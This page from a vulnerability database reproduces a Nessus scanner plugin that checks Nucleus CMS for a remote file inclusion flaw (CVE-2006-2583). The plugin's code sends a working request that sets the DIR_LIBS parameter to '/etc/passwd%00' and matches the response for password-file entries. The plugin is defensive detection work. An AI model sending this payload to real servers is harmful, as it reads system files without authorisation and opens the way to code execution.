Lucene search
K

Nucleus CMS PLUGINADMIN.php DIR_LIBS Parameter Remote File Inclusion

🗓️ 25 May 2006 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 25 Views

Nucleus CMS PLUGINADMIN.php DIR_LIBS Parameter Remote File Inclusion vulnerability in Nucleus CM

Related
Refs
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Nucleus CMS < 3.23 PLUGINADMIN.php DIR_LIBS Parameter Remote File Inclusion
25 May 200600:00
nessus
ATTACKERKB
CVE-2006-2595
25 May 200610:02
attackerkb
CVE
CVE-2006-2583
25 May 200610:00
cve
Cvelist
CVE-2006-2583
25 May 200610:00
cvelist
EUVD
EUVD-2006-2582
7 Oct 202500:30
euvd
NVD
CVE-2006-2583
25 May 200610:02
nvd
Prion
Remote file inclusion
25 May 200610:02
prion
Positive Technologies
PT-2006-3529 · Nucleus · Nucleus
25 May 200600:00
ptsecurity
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(21596);
  script_version("1.19");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-2583");
  script_bugtraq_id(18097);

  script_name(english:"Nucleus CMS PLUGINADMIN.php DIR_LIBS Parameter Remote File Inclusion");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to remote
file inclusion attacks.");
  script_set_attribute(attribute:"description", value:
"The remote host is running Nucleus CMS, an open source content
management system. 

The version of Nucleus CMS installed on the remote host fails to
sanitize input to the 'DIR_LIBS' parameter before using it in a PHP
include() function in the 'nucleus/libs/PLUGINADMIN.php' script. 
Provided PHP's 'register_globals' setting is enabled, an
unauthenticated attacker may be able to exploit this flaw to view
arbitrary files on the remote host or to execute arbitrary PHP code,
possibly taken from third-party hosts.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/434837/30/0/threaded");
  script_set_attribute(attribute:"see_also", value:"http://nucleuscms.org/item/3038");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Nucleus version 3.23 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/23");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/25");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:nucleus_group:nucleus_cms");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);


# Loop through various directories.
if (thorough_tests) dirs = list_uniq(make_list("/nucleus", "/blog", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the flaw to read a file.
  file = "/etc/passwd%00";
  w = http_send_recv3(method:"GET", 
    item:string(
      dir, "/nucleus/libs/PLUGINADMIN.php?",
      "GLOBALS[DIR_LIBS]=", file
    ), 
    port:port
  );
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # There's a problem if...
  if (
    # there's an entry for root or...
    egrep(pattern:"root:.*:0:[01]:", string:res) ||
    # we get an error saying "failed to open stream".
    egrep(pattern:"main\(/etc/passwd\\0ADMIN\.php.+ failed to open stream", string:res) ||
    # we get an error claiming the file doesn't exist or...
    egrep(pattern:"main\(/etc/passwd\).*: failed to open stream: No such file or directory", string:res) ||
    # we get an error about open_basedir restriction.
    egrep(pattern:"main.+ open_basedir restriction in effect. File\(/etc/passwd", string:res)
  )
  {
    if (egrep(string:res, pattern:"root:.*:0:[01]:"))
    {
      res = data_protection::redact_etc_passwd(output:res);
      report = string(
        "\n",
        "Here are the contents of the file '/etc/passwd' that Nessus\n",
        "was able to read from the remote host :\n",
        "\n",
        res
      );
      security_warning(port:port, extra:report);
    }
    else security_warning(port);

    exit(0);
  }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation